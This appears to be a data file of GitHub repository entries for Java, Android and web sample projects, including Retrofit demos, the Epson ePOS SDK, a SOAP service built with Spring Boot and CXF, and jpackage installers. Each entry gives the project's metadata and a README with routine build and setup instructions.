Earlier this year (2017) I was asked if there’s a good way to compare developing web UIs in Google Web Toolkit (GWT) vs. Dart, specifically AngularDart. Having worked with both GWT and Dart, I had a good idea of the differences, but as I thought more, I started to wonder how hard it would be to migrate a GWT application to AngularDart.

The GWT Mail Sample was an ideal place to start: it’s much more than a trivial example, with diverse features and complex UI interactions, yet it’s still manageable in size.

- Demo: https://isoos.github.io/gwt_mail_sample/
- Article: https://medium.com/@isoos/from-gwt-to-angulardart-a-case-study-with-source-code-a049ba8b6df3

You may follow the [changelog](https://github.com/isoos/gwt_mail_sample/blob/master/log.md) or look at the [commits](https://github.com/isoos/gwt_mail_sample/commits/master) for the breakdown of the small steps needed.
1
sunrenjie/jpwh-2e-examples
Sample code from the book Java Persistence with Hibernate, Second Edition
null
null
1
jacobtabak/droidcon
Droidcon 2014 Retrofit Sample
null
Droidcon NYC 2014 Retrofit Demo
===============================

This sample project demonstrates Retrofit implementations for the Foursquare and Reddit APIs.

Foursquare
----------

The Foursquare demo is a rather straightforward Retrofit implementation. The documentation for the venues endpoint can be found [here](https://developer.foursquare.com/docs/venues/search).

You can find the Foursquare models [here](app/src/main/java/com/timehop/droidcon2014retrofitsample/data/foursquare/model), and the Retrofit service interface in [FoursquareService.java](app/src/main/java/com/timehop/droidcon2014retrofitsample/data/foursquare/FoursquareService.java).

These models implement a strict pattern of defining the JSON field names in constants at the top of the file because our [legacy async task implementation](app/src/main/java/com/timehop/droidcon2014retrofitsample/data/foursquare/legacy/VenueSearchTask.java) does not benefit from the @SerializedName annotation, and in order to maintain refactorability, the JSON field names must be defined separately.

The 4sq service interface also has a nested class called `FoursquareService.Implementation` which can be used to access the default implementation of the service like this:

```java
FoursquareService.Implementation.get()
```

With an instance of the service, you may call any methods defined in the FoursquareService interface, like so:

```java
FoursquareService.Implementation.get().searchVenues("New York");
```

To view the API in action, either look at the [tests](app/src/androidTest/java/com/timehop/droidcon2014retrofitsample/data/foursquare/FoursquareTests.java) or [sample activity](app/src/main/java/com/timehop/droidcon2014retrofitsample/VenueSearchActivity.java).

Reddit
------

The reddit demo is a bit more complex since reddit returns dynamically-typed JSON. The API documentation for reddit is available [here](http://www.reddit.com/dev/api). The important thing to take out of this is that reddit 'things' are typed as follows:

* t1: Comment
* t2: Account
* t3: Link
* t4: Message
* t5: Subreddit
* t6: Award
* t8: PromoCampaign

The reddit models in this sample can be found [here](/app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/model) and the Retrofit API interface can be found [here](/app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/RedditService.java).

The challenge is to instruct GSON, through the use of a type adapter, how to instantiate the correct subclass of `RedditObject` at runtime. This is achieved through the [RedditObjectDeserializer](app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/RedditObjectDeserializer.java) with the help of the [RedditType enumeration](app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/RedditType.java).

The [RedditType enum](app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/RedditType.java) maps the types defined in the reddit documentation to the Java classes that model them.

The [RedditObjectDeserializer](app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/RedditObjectDeserializer.java) first examines the wrapped JSON objects that look like this:

```json
{
  "kind": "t1",
  "data": { ... }
}
```

and converts them into a [RedditObjectWrapper](app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/model/RedditObjectWrapper.java) that looks like this:

```java
public class RedditObjectWrapper {
  RedditType kind;
  JsonElement data;
}
```

Then, the [RedditObjectDeserializer](app/src/main/java/com/timehop/droidcon2014retrofitsample/data/reddit/RedditObjectDeserializer.java) passes the wrapped JSON and the correct derived class into the existing deserialization context to create the correct model.

```java
RedditObjectWrapper wrapper = new Gson().fromJson(json, RedditObjectWrapper.class);
return context.deserialize(wrapper.data, wrapper.kind.getDerivedClass());
```

Persisting Cookies
------------------

Check out [this gist](http://git.io/U2rqkg) for an easy way to persist cookies.
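To make the `wrapper.kind.getDerivedClass()` step above concrete, here is a dependency-free sketch of the kind-to-class mapping that such a `RedditType` enum performs. The model classes below are hypothetical stand-ins for the project's real `RedditObject` subclasses, not copies of its code:

```java
import java.util.Locale;

// Sketch of mapping reddit "kind" strings (t1, t3, t5, ...) onto the Java
// classes that model them, so a deserializer can pick the right subclass.
public class RedditTypeDemo {

    static class RedditObject {}
    static class Comment extends RedditObject {}
    static class Link extends RedditObject {}
    static class Subreddit extends RedditObject {}

    enum RedditType {
        T1(Comment.class),
        T3(Link.class),
        T5(Subreddit.class);

        private final Class<? extends RedditObject> derivedClass;

        RedditType(Class<? extends RedditObject> derivedClass) {
            this.derivedClass = derivedClass;
        }

        Class<? extends RedditObject> getDerivedClass() {
            return derivedClass;
        }

        // Maps a JSON "kind" value such as "t1" onto the enum constant.
        static RedditType fromKind(String kind) {
            return valueOf(kind.toUpperCase(Locale.ROOT));
        }
    }

    public static void main(String[] args) {
        // Given {"kind": "t1", ...}, the deserializer can now pick Comment.class.
        System.out.println(RedditType.fromKind("t1").getDerivedClass().getSimpleName()); // Comment
    }
}
```

In the real project, GSON deserializes the `kind` field directly into the enum, and the custom `JsonDeserializer` then hands `wrapper.data` plus this class token to the deserialization context.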
1
Kernald/recyclerview-sample
Sample for article at https://enoent.fr/blog/2015/01/18/recyclerview-basics/
null
null
1
EPSONePOS/ePOS
EPSON ePOS Printer Sample
null
# ePOS-Print SDK for Android

![N|Solid](http://global.epson.com/assets/img/logo.png)

Version 1.9.0a
Copyright Seiko Epson Corporation 2012-2015 All rights reserved.

# About this software!

The ePOS-Print SDK for Android is an SDK aimed at development engineers who are developing Android applications for printing on an EPSON TM printer. Applications are developed using the APIs provided by the ePOS-Print SDK. ePOS-Print SDK for iOS for iOS devices is also provided in ePOS-Print SDK. For detailed information, please see the ePOS-Print SDK for Android User's Manual.

- Android Versions
  - Android 2.3.3 to 2.3.7
  - Android 3.1 to 3.2.2
  - Android 4.0 to 4.4
  - Android 5.0 to 5.1
- Android Devices
  - ARMv5TE-based Android devices
- Supported Printers
  - EPSON TM-T88V
  - EPSON TM-T70
  - EPSON TM-T70II
  - EPSON TM-T20
  - EPSON TM-T82
  - EPSON TM-T81II
  - EPSON TM-T82II
  - EPSON TM-U220 series
  - EPSON TM-P60
  - EPSON TM-P60II
  - EPSON TM-T90II
  - EPSON TM-T20II
  - EPSON TM-P80
  - EPSON TM-U330 series
  - EPSON TM-T83II
  - EPSON TM-P20
  - EPSON TM-m10
- Supported Interfaces
  - Wired LAN
  - Wireless LAN
  - Bluetooth
  - USB

### Supplied Files

- ePOS-Print.jar
  Compiled Java class file, archived into a jar format file to allow APIs to be used from Java programs.
- ePOSEasySelect.jar
  A Java class file for selecting a printer easily.
- libeposprint.so
  Library for function execution. (ARMv5TE supported)
- libeposeasyselect.so
  Library for the ePOSEasySelect function execution. (ARMv5TE supported)
- ePOS-Print_Sample_Android.zip
  A sample program file.
- EULA.en.txt
  Contains the SOFTWARE LICENSE AGREEMENT.
- EULA.jp.txt
  Contains the SOFTWARE LICENSE AGREEMENT. (The Japanese-language edition)
- ePOS-Print_SDK_Android_en_revP.pdf
  A user's manual.
- ePOS-Print_SDK_Android_ja_revL.pdf
  A user's manual. (The Japanese-language edition)
- ePOS-Print_SDK_Android_AppDevGuide_E_RevB.pdf
  A developer's guide.
- ePOS-Print_SDK_Android_AppDevGuide_J_RevB.pdf
  A developer's guide. (The Japanese-language edition)
- README.en.txt
  This file.
- README.jp.txt
  The Japanese-language edition of this file.

### Remarks

- For detailed information, please see the ePOS-Print SDK for Android User's Manual.
- In the case of the USB interface, it is recommended that you obtain permission to access the USB device in the application in advance. How to get the permission is noted below.

  1. Enter the following code into the AndroidManifest.xml file.

  ```xml
  <manifest ...>
    <application>
      <activity ...>
        <intent-filter>
          <action android:name="android.hardware.usb.action.USB_DEVICE_ATTACHED" />
        </intent-filter>
        <meta-data android:name="android.hardware.usb.action.USB_DEVICE_ATTACHED"
            android:resource="@xml/device_filter" />
      </activity>
    </application>
  </manifest>
  ```

  2. Add the res/xml/device_filter.xml resource file, and enter the following code into the device_filter.xml file.

  ```xml
  <?xml version="1.0" encoding="utf-8"?>
  <resources>
    <usb-device vendor-id="1208" />
  </resources>
  ```

  Please select the OK button when the permission dialog is displayed.

  If you don't obtain permission to access the USB device in advance, there are the following notes when using the openPrinter method:
  - When you select the OK button in the Permissions dialog box, it takes a long time of about 10 seconds to open the port.
  - When you select the Cancel button in the Permissions dialog box, it waits for a timeout of 30 seconds.

### Modification from the old version

Version 1.9.0a
- Improved the parseNFC API.
- parseNFC API supports TM-m10 Ethernet model.
- Bug fixed:
  - In ePOSReceiptPrintSample, when the TM-T88V is to print on paper of 58mm width, a new line enters the middle of a line.
  - In ePOSReceiptPrintSample, the print size of the logo is changed by the resolution of the screen.

Version 1.9.0
- Added the beginTransaction API for beginning a transaction.
- Added the endTransaction API for ending a transaction.
- Added support for printers:
  - TM-m10 Ethernet model
  - TM-P80 Autocutter model

Version 1.8.0
- Added support for printers:
  - TM-m10 USB model
- Added getStatus API.
- Bug fixed:
  - Under Bluetooth connection, the openPrinter method may fail if the application calls it immediately after the closePrinter method.

Version 1.7.0
- Added supported Android versions:
  - Android 5.0 to 5.1
- Added supported languages:
  - Indian
- Improved the openPrinter API.
  - The openPrinter method succeeds even if lowercase letters are specified for the MAC address. (Only Bluetooth connection)

Version 1.6.0
- Added support for printers:
  - TM-P20
- Added a printer search API for getting the device name.
- Added the openPrinter API for timeout settings.
- Improved the openPrinter API.
  - Not only the IP address but also the MAC address or the host name can be set as the deviceName. (Only TCP/IP connection)
- Improved the log function.
  - Compression of the backup file.
  - Improved the output content.
- Specification change:
  - openPrinter returns an error after the specified time passed if the target printer is already opened. (Only TCP/IP connection)

Version 1.5.0
- Added support for printers:
  - TM-U330
  - TM-T83II
- Added an API for compressed image data processing.

Version 1.4.2
- Bug fixed:
  - Status when calling the sendData method was incorrect.

Version 1.4.1
- Bug fixed:
  - The openPrinter and sendData methods cause a one second delay when the printer doesn't have a battery.

Version 1.4.0
- Added supported interface:
  - USB
- Improved the status monitoring function.
  - Improved the communication efficiency of status acquisition.
- Bug fixed:
  - Added TM-P80 support for the addCut, addFeedPosition and addLayout APIs.

Version 1.3.4a
- Added supported Android version:
  - Android 4.4

Version 1.3.4
- Bug fixed:
  - The closePrinter method may fail during printer status monitoring.
  - When the printer is offline, the openPrinter method may not return the correct printer status under Bluetooth connection.

Version 1.3.3
- Improved the text printing speed.

Version 1.3.2
- Added support for printers:
  - TM-T20II
  - TM-P80

Version 1.3.1
- Added support for printers:
  - TM-T90II
- Added supported Android version:
  - Android 4.2.2

Version 1.3.0
- Added the log output function.
- Added support for printers:
  - TM-T70II
- Added supported Android version:
  - Android 4.2.1

Version 1.2.1
- Bug fixed.

Version 1.2.0
- Added a command generation API for controlling the label.
- Added a command generation API to set the paper layout.
- Added support for printers:
  - TM-T82II

Version 1.1.0
- Added the printer status monitoring function.
- Added the halftone method for raster graphic printing.
  - Support for multiple tone printing.
- Added supported languages:
  - Simplified Chinese
  - Traditional Chinese
  - Korean
  - Thai
  - Vietnamese
- Added the battery status monitoring function.
- Improved the performance of graphic printing.
- Added support for printers:
  - TM-T20
  - TM-T82
  - TM-T81II
  - TM-P60II
  - TM-P60 (Wireless LAN)

Version 1.0.0
- New release.
1
odnoklassniki/jvm-serviceability-examples
Sample code for the presentation on JVM Serviceability Tools
null
null
1
jonashackt/soap-spring-boot-cxf
Sample Project for producing & testing a SOAP-WSDL-driven Service with Spring Boot, Apache CXF & JAX-WS
apache-cxf java jax-ws soap spring-boot wsdl
# SOAP-Webservices with Apache CXF & SpringBoot using JAX-WS RI & JAXB - Annotations only, absolutely no XML [![Build Status](https://travis-ci.org/jonashackt/soap-spring-boot-cxf.svg?branch=master)](https://travis-ci.org/jonashackt/soap-spring-boot-cxf) [![Coverage Status](https://coveralls.io/repos/jonashackt/soap-spring-boot-cxf/badge.svg)](https://coveralls.io/r/jonashackt/soap-spring-boot-cxf) [![Dependency Status](https://www.versioneye.com/user/projects/56cc650818b27104252de8f6/badge.svg?style=flat)](https://www.versioneye.com/user/projects/56cc650818b27104252de8f6) As Example SOAP-Service I did some research, but after all the well-known [Weather-Service] seemed to be the best Use-Case, although (or because?) it is used by nearly every tutorial. It is really hard to find free SOAP-Services on the web. But i had to extend the Weather-Service a lot through out development - e.g. Custom Exceptions, more complex Input-Requests and a little less methods, so i can show my findings better. The biggest change was to split it into a WSDL (as "just the SOAP-interface") and a bunch of XSDs that import each other. That should represent a more complex domain and although they do not contain that much definitions, i can show many related techniques much better, that appear commonly in real-world scenarios. So this example-project is capable for bigger Use-Cases in Realworld-Scenarios with huge WSDLs and lots of imported XSDs, which again import tons of other XSDs. If you want, test it with your Service and i appreciate feedback :) ### General choices In the project I tried to use some relevant technologies for getting SOAP-Services running, like: * [Spring] with the aim to use absolutely no XML-Configuration (just Annotations) * [Spring Boot], for easy "not care about Container" (cause it has an embedded [Tomcat]) and simple deployment - like Microservices (without the "micro" in the interface, since we are bound to SOAP...) 
* One of the most relevant SOAP-Stack [Apache CXF] 3 as the Webservice-Stack to expose the SOAP-Webservices * Oracle´s JAX-WS RI (Reference Implementation) with the [JAX-WS-commons project] as "the Standard" to define Webservices in Java * [JAXB Java-XML-Binding] for working with XML * JAX-WS Commons for Generating the Class-Files for JAXB, managed by the maven plugin [jaxws-maven-plugin] I reached my aim to not use any XML-configuration, but it was harder than i thought... If you look on some detail, you´ll see what i mean. ### HowTo Use Run "mvn clean package"-command at command-line, to ensure that all necessary Java-Classes & JAXB-Bindings are generated Then, you could use Spring Boot with maven to expose your SOAP-Webservices ```sh mvn spring-boot:run ``` or run the build .jar-File with ```sh java -jar soap-spring-boot-cxf-0.0.5-SNAPSHOT.jar ``` ### Testing For testing end-to-end purposes I would recommend also getting [SOAP-UI], where you can check WSDL/XSD-compliance of the provided services very easily and you "see" your services. But getting to know, how stuff is working, it´s often better to have a look at some tests. There should be a amount of test-cases, that show standard (JAX-WS with CXF) ways to test webservices, but also non-standard approaches to test some UseCases i came across developing e.g. the custom SoapFaults on incorrect XML-messages. ### Facade-Mode Sometimes, you are in need of a facade-mode, where your implementation doesn´t call real backends and only returns Dummy-Responses. E.g. when you want to protect your backends when load is getting to high for them (not for your server :), that is based on solid Spring-technology) or even if you want to build up a new environment, where your backends are not available right from the start. And you want this configurable, so you can react fast, when needed. For this Scenario, Spring´s powerful [Aspect oriented programming (AOP)] mechanism will serve you well. 
In combination with using org.springframework.core.io.Resource to load your Dummy-Response-Files instead of Java´s NIO.2 (that could [fuck you up] because of classloader-differences in other environments than your local machine), your done with that task quite fast. ### Done´s * No XML-configuration, also for undocumented CXF-details :) * Readable Namespace-Prefixes * Testcases with Apache CXF * Custom SoapFault, when non-schmeme-compliant or syntactically incorrect XML is send to the service * Tests with Raw HTTP-Client for Reaction on syntactically incorrect XML * Custom Exception in Weather-WSDL/XSDs * Example of Controller and Mappers, that map to and from an internal Domain-Model - for loose coupling between generated JAXB-Classes and Backends * Facade-Mode, that only returns Dummy-Responses, if configured * Logging-Framework for centralization of logging and message-creation, including chance to define individial logging-Ids * Webservice-Method that returns a PDF-File (you can view the base64-encoded String inside the Webservice´ Response with a small Angular/Boot-App I wrote for that: [base64gular]) * PDF-Test with asserts of the PDF-contents via [Pdfbox] * Deployment to [Heroku], with inspiration from my colleague´s [blogpost] - see it in action (maybe you have to wait a while, cause it´s just a free Heroku-Dyno) [here] - or call it via [SOAP-UI] ## Loganalysis with [ELK-Stack] If you´re going some steps further into a more production-ready environment, you´ll need a more indepth view what´s going on with your SOAP-Infrastructure. I used the [ELK-Stack] with Logstash -> Elasticsearch -> Kibana. I used the [logstash-logback-encoder] for getting JSONized Logoutputs directly into logstash´s input-phase. 
![Kibana SOAP-Message Analytics](https://github.com/jonashackt/soap-spring-boot-cxf/blob/master/kibana_SOAP-Message-Analytics.png) Making your SpringBoot-App ready for logstash, you have to add a maven-dependency and a logback.xml-File with the apropriate configuration, also described in [logstash-logback-encoder]. Before doing so, you need a running ELK-Stack, for me I used a docker-compose(ition) from [docker-elk]. For Mac-Users remember the new [docker-machine] superseeding boot2docker. Testing your configured ELK-Stack is easy by using [SOAP-UI]´s Load-Test-Feature. After having set up your ELK-Stack and logs are transferred via logstash into Elasticsearch and you activated SOAP-Message-Logging as shown in the CXF-WebService-Configuration, you for shure want to play aroung with the [Kibana´s Visualisation-Features]. And in the end you also want a [Dashboard] configured to show all your stylish Visualisations. You could end up with something like that: ![Kibana-Dashboard for SOAP-Message Analytics](https://github.com/jonashackt/soap-spring-boot-cxf/blob/master/kibana_SOAP-Analytics_dashboard.png) If if you can´t wait to start or the tutorials are [tldr;], then import my [kibana_export.json](https://github.com/jonashackt/soap-spring-boot-cxf/blob/master/kibana_export.json) as an example. ### Done´s with Loganalysis with ELK-Stack * Correlate all Log-Messages (Selfmade + ApacheCXFs SOAP-Messages) within the Scope of one Service-Consumer`s Call in Kibana via logback´s [MDC], placed in a Servlet-Filter * Log SOAP-Messages to logfile (configurable) * Log SOAP-Messages only to Elasticsearch-Field, not Console (other Implementation) * Extract SOAP-Service-Method for Loganalysis * SOAP-Messages-Only logged and formatted for Analysis * Added anonymize-logstash-filter for personal data in SOAP-Messages (e.g. 
for production environments in German companies)
* Dead simple calltime logging

## Functional plausibility check of request-data in the internal Domain-Model

A very common problem of projects that implement SOAP webservices: the internal domain model differs from the externally defined model (the XML Schema/XSD that's imported into the WSDL). This leads to mapping data from the generated JAXB classes to the internal domain model, which can be handled simply in Java. But the internal domain model's data has to be validated after that mapping - e.g. to make sure everything is correct and functionally plausible for further processing when backend systems are called.

IMHO this topic isn't covered well in the tutorial landscape - the very least you can find is the hint to use [JSR303/349 Bean Validation], which is quite fast to apply but also quite limited when it comes to more complex scenarios. And with multiple SOAP methods described in multiple webservices, a multitude of fields that shouldn't be null (and aren't described as such in the XML schema), and lots of plausibility to check depending on the former, you are in complexity hell. Then all research points you to the ongoing war of the [pros and cons to use RuleEngines] (indeed, [Martin Fowler has something to say about that]) and to trying to set up something like Drools (including the attempt to reduce Drools' predominant complexity by building your own [spring-boot-starter-drools]). After getting into that trouble, you begin to hate all rules engines and try to build something yourself, or use [EasyRules] with the problems pointed out well in [this presentation]. But I'm sorry, the complexity will stay, and you will get so many rule classes and tests to handle that you find yourself in serious trouble if your project is under pressure to release - which for sure is the case if you went through all this.
Finally your domain expert will visit you, showing a nice Excel table which contains everything we discussed above - still relatively long, but much shorter than all your classes developed by hand - and you didn't cover 10% of it by now. Maybe at this point you remember something you learned back in the days of your studies - [decision tables]. The domain expert found the simplest possible solution for this complex problem with ease. Wouldn't it be nice if you had something like that - without the need to use something complex and hard to develop like Drools?

[JSR303/349 Bean Validation]:https://en.wikipedia.org/wiki/Bean_Validation
[Martin Fowler has something to say about that]:http://martinfowler.com/bliki/RulesEngine.html
[pros and cons to use RuleEngines]:http://stackoverflow.com/questions/775170/when-should-you-not-use-a-rules-engine
[spring-boot-starter-drools]:https://github.com/jonashackt/spring-boot-starter-drools
[EasyRules]:http://www.easyrules.org/
[this presentation]:https://speakerdeck.com/benas/easy-rules
[decision tables]:https://en.wikipedia.org/wiki/Decision_table

## Rules with DMN-Decision Tables compliant to the OMG-Standard

One approach is to check the request data with [decision tables]. For that I used a neat, small, yet powerful and quite young engine: [camunda's DMN Engine](https://github.com/camunda/camunda-engine-dmn). It implements OMG's [DMN-Standard](http://www.omg.org/spec/DMN/). In our use case we have fields described in the internal domain model that have to be checked depending on the called webservice method and the product.
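To make the idea concrete before looking at the DMN files: a decision table is just rows of condition/outcome pairs evaluated under a hit policy. A hand-rolled plain-Java illustration (hypothetical wind-speed rules; this is *not* the camunda DMN API, just the concept):

```java
import java.util.List;
import java.util.function.DoublePredicate;

public class WeatherPlausibilityTable {

    // One "row" of the table: a condition on the input and the resulting verdict.
    record Rule(DoublePredicate condition, String verdict) {}

    // Hypothetical plausibility rules for a wind-speed field.
    static final List<Rule> RULES = List.of(
            new Rule(v -> v < 0, "implausible: negative wind speed"),
            new Rule(v -> v > 120, "implausible: beyond hurricane range"),
            new Rule(v -> true, "plausible"));  // catch-all row

    // FIRST hit policy: the first matching row wins, like FIRST in DMN.
    static String check(double windSpeed) {
        return RULES.stream()
                .filter(r -> r.condition().test(windSpeed))
                .findFirst()
                .map(Rule::verdict)
                .orElseThrow();
    }
}
```

The point of delegating exactly this kind of table to a DMN engine is that the rules then live in a .dmn file the domain expert can maintain, instead of in hand-written Java classes.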
So I decided to go with two DMN decision tables. The first, "weatherFields2Check.dmn", contains rules that determine whether the current field must be checked in the next step:

![WeatherFields2Check-DMN](https://github.com/jonashackt/soap-spring-boot-cxf/blob/master/weatherFields2CheckDMN.png)

If the field has to be checked, the actual functional plausibility rules are applied - again depending on the product:

![WeatherRules-DMN](https://github.com/jonashackt/soap-spring-boot-cxf/blob/master/weatherRulesDMN.png)

For now, you have to separate rules with different datatypes into different decision-table columns.

## Todo's

* Configure Servicename in logback.xml from static fields
* Fault tolerance with Hystrix (e.g. to avoid problems because of accumulated timeouts)

[Spring]:https://spring.io
[Spring Boot]:http://projects.spring.io/spring-boot/
[Spring WS]:http://projects.spring.io/spring-ws/
[Apache CXF]:http://cxf.apache.org/
[JAXB Java-XML-Binding]:http://en.wikipedia.org/wiki/Java_Architecture_for_XML_Binding
[SOAP-UI]:http://www.soapui.org/
[jaxws-maven-plugin]:https://jax-ws-commons.java.net/jaxws-maven-plugin/
[JAX-WS-commons project]:https://jax-ws-commons.java.net/spring/
[Weather-Service]:http://wsf.cdyne.com/WeatherWS/Weather.asmx
[Tomcat]:http://tomcat.apache.org/
[decision tables]:https://en.wikipedia.org/wiki/Decision_table
[Aspect oriented programming (AOP)]:https://docs.spring.io/spring/docs/current/spring-framework-reference/html/aop.html
[fuck you up]:https://github.com/jonashackt/springbootreadfilejar
[ELK-Stack]:https://www.elastic.co/products
[logstash-logback-encoder]:https://github.com/logstash/logstash-logback-encoder/tree/logstash-logback-encoder-4.5
[docker-elk]:https://github.com/jonashackt/docker-elk
[docker-machine]:https://docs.docker.com/machine/get-started/
[Pdfbox]:https://pdfbox.apache.org/index.html
[base64gular]:https://github.com/jonashackt/base64gular
[MDC]:http://logback.qos.ch/manual/mdc.html
[Heroku]:https://www.heroku.com/home
[blogpost]:https://blog.codecentric.de/en/2015/10/deploying-spring-boot-applications-to-heroku/
[here]:https://soap-spring-boot-cxf.herokuapp.com/soap-api
[Kibana´s Visualisation-Features]:https://www.timroes.de/2015/02/07/kibana-4-tutorial-part-3-visualize/
[Dashboard]:https://www.timroes.de/2015/02/07/kibana-4-tutorial-part-4-dashboard/
[tldr;]:https://en.wiktionary.org/wiki/TLDR
1
zcmgyu/websocket-spring-react
Sample about WebSocket using React and Spring Boot OAuth2 to send notifications between users.
null
## Spring Boot Websocket + React: user notifications with web socket ##

This example will show how to send notifications, via web socket, to specific logged-in users (defined by access_token). It could be useful, for example, if you are trying to implement a real-time user notification system with ReactJS.

[*DEMO*:](https://giphy.com/gifs/3o6fIRpgI9LnZ3jrXi/fullscreen)

![Demo](https://media.giphy.com/media/3ohs7JcKo7aeM2PHdC/giphy.gif)

### Build and run

#### Configurations

Backend: Open the `application.properties` file in *websocket-spring* and set your own database (in my case I'm using MongoDB). You can change the User collection to an entity and repository that match your project.

#### Prerequisites

- Java 8
- Maven > 3.0

#### From terminal

1. Start the mongodb database

```
$ mongod
```

2. Go to the project's *websocket-spring* folder, then type:

```
$ mvn spring-boot:run
```

Or just open the Maven project in an IDE like IntelliJ IDEA and run the `main method` in the Application class

3. Go to the project's *websocket-react* folder, then type:

```
$ npm install
$ npm start
```

or

```
$ yarn install
$ yarn start
```

### Usage

- Launch the application and log into it with one of the following credentials (Username / Password):
  * user1 / user1
  * user2 / user2
- Keep a window open on the index and log in as user1
- Open a new private/incognito window of your web browser and log in as *user2*
- From this web browser specify the *target user* and click the button to send a fake action: the **target user** will be notified.

### Reference

Special thanks to **azanelli** for the great [example](https://github.com/netgloo/spring-boot-samples/tree/master/spring-boot-web-socket-user-notifications)
1
MoshDev/LikeYahooWeather
This is a sample that shows a list view with a blur effect, similar to the Yahoo Weather app
null
LikeYahooWeather
================

This is a sample that shows a list view with a blur effect, similar to the Yahoo Weather app.

Snapshots
================

![Sample image1][1] ![Sample image2][2]

[1]:http://i.imgur.com/9Z3BrWc.png?1
[2]:http://i.imgur.com/0PxQuIU.png?1
1
spencergibb/myfeed
Myfeed is a sample cloud-native application built using spring-cloud
null
# myfeed

Myfeed is a non-trivial sample cloud-native application built using:

* spring-cloud
* spring-boot
* spring-data

# build

Java 8. We use the [takari/maven-wrapper](https://github.com/takari/maven-wrapper).

```
./mvnw clean package
```

or (on Windows)

```
mvnw.bat clean package
```

## TODO

- [X] RxJava Sample
- [X] Following
- [X] login/logout
- [X] Posting
- [X] Post feed items to following users
- [X] Profile view
- [ ] Create UI View using stream, replace live aggregating with uiview
- [ ] Security
- [ ] RedisSession
- [ ] Spring Restdocs
- [ ] Websockets update feed: https://spring.io/guides/gs/messaging-stomp-websocket/
- [ ] Non-java service
- [ ] Unfollowing
- [ ] Profile edit

## Services

infrastructure apps (id: default port)

* myfeed-config: 11010
* myfeed-discovery: 11020
* myfeed-router: 11080
* myfeed-turbine: 11090

user apps (id: default port)

* myfeed-admin: 11050
* myfeed-feed: 11060
* myfeed-user: 11070
* myfeed-ui: 11040

## external requirements

* redis
* github account

## /etc/hosts entries

    127.0.0.1 www.myfeed.com
    127.0.0.1 discovery.myfeed.com
    127.0.0.1 config.myfeed.com

## or setup dnsmasq on a mac like so (in dnsmasq.conf)

    address=/myfeed.com/127.0.0.1
    listen-address=127.0.0.1

and add the following to `/etc/resolver/myfeed.com`

    nameserver 127.0.0.1
1
ghillert/spring-batch-integration-sample
Sample for the Spring Batch Integration project - see: https://github.com/SpringSource/spring-batch-admin/tree/master/spring-batch-integration
null
Spring Batch Integration Samples
================================

[![Build Status](https://travis-ci.org/ghillert/spring-batch-integration-sample.svg)](https://travis-ci.org/ghillert/spring-batch-integration-sample)

This project contains samples for the [Spring Batch Integration][] module.

[Spring Batch Integration]: https://github.com/spring-projects/spring-batch/tree/master/spring-batch-integration

The samples are based on the sample originally created for the book [Spring Integration in Action](http://www.amazon.com/Spring-Integration-Action-Mark-Fisher/dp/1935182439/). You can find that sample at:

* https://github.com/spring-projects/Spring-Integration-in-Action/tree/master/siia-examples/batch

## Objective

This sample uses **Spring Batch Integration** to more easily use *Spring Batch* and *Spring Integration* together. The application will poll a directory for a file that contains 27 payment records. *Spring Batch* will subsequently process those payments. If an error occurs, the Job is resubmitted.

## Provided Samples

In order to illustrate the various concurrent processing techniques, we provide the following samples:

* Batch Integration - Payment Import
* Batch Integration - Payment Import using Concurrent Step
* Batch Integration - Payment Import using Async Processor and Writer
  - without Spring Integration
  - with Spring Integration
1
wiverson/maven-jpackage-template
Sample project illustrating building nice, small cross-platform JavaFX or Swing desktop apps with native installers while still using the standard Maven dependency system.
cross-platform-javafx java javafx javafx-application javafx-desktop-apps jpackage macos maven native-installers
# Java + Maven + GitHub Actions = Native Desktop Apps

[JavaFX](https://openjfx.io) or Swing + [jpackage](https://docs.oracle.com/en/java/javase/18/docs/specs/man/jpackage.html) + [Maven](http://maven.apache.org) template project for generating native desktop applications.

# Goals

1. Build nice, small cross-platform JavaFX or Swing desktop apps with native installers!
2. Just use Maven - no shell scripts required!
3. Use the standard Maven dependency system to manage dependencies.
4. Generate [MacOS (.dmg), Windows (.msi) and Unix (e.g. deb/rpm)](https://github.com/wiverson/maven-jpackage-template/releases) installers/packages in the cloud with [GitHub Actions](https://github.com/wiverson/maven-jpackage-template/tree/main/.github/workflows).

Out of the box, this template generates "Hello World" installers - 30-40mb .dmg, .msi and .deb files. Check out the example builds in [releases](https://github.com/wiverson/maven-jpackage-template/releases).

If you are on MacOS, you will notice the MacOS builds are not signed. Current versions of MacOS will report installers downloaded via browsers as damaged/unopenable. You can [clear this flag via the command-line](docs/apple-sign-notarize.md). As this is not a reasonable solution for end users, a GitHub Action is included to notarize, sign, and staple MacOS installers, but the secrets aren't set up for this repository by default. You will need an Apple Developer account to get this working. [More information on MacOS signing](docs/apple-sign-notarize.md).

# Overview

This template uses a [Maven plugin](https://github.com/wiverson/jtoolprovider-plugin) to generate a custom JVM and installer package for a JavaFX application. It can easily be adapted to work with Swing instead. Check out the [announcements and recent updates](https://github.com/wiverson/maven-jpackage-template/discussions/categories/announcements).

## Requirements

- [Java 18](https://bell-sw.com/pages/downloads/#/java-18-current).
- If you are using JavaFX, use an SDK that has JavaFX bundled:
  - [Liberica with JavaFX](https://bell-sw.com/pages/downloads/#/java-18-current)
  - [Azul Zulu with JavaFX](https://www.azul.com/downloads/?version=java-18-sts&package=jdk-fx)
- If you are using Swing, pretty much any Java 17 or 18 JDK will work.
- [Maven](https://maven.apache.org/).
- On MacOS, XCode is required.
- On Windows, the free [WiX Toolset](https://wixtoolset.org/) is required.

## Installation

If you are on Windows, you will need to install Java, Maven, and WiX manually. If you are on MacOS or Linux, you can use [SDKMAN!](https://sdkman.io/) to simplify installing Java and Maven. Once SDKMAN! is installed, you can run the following to install Liberica or Azul Zulu and Maven.

```bash
sdk install java 18.0.2.fx-librca
# or
sdk install java 18.0.2.fx-zulu
sdk current java
sdk install maven
```

## Installation Verification

1. Verify that Java is installed by opening a fresh Terminal/Command Prompt and entering `java --version`. As of this writing, the Java version should be 18.0.2 or later.
2. Verify that Maven is installed with `mvn --version`. Maven should be version 3.8.6 or later.
3. Install platform-specific tools.
   1. **MacOS only:** Verify that XCode is installed & the license accepted by a) launching it and b) running `sudo xcodebuild -license`.
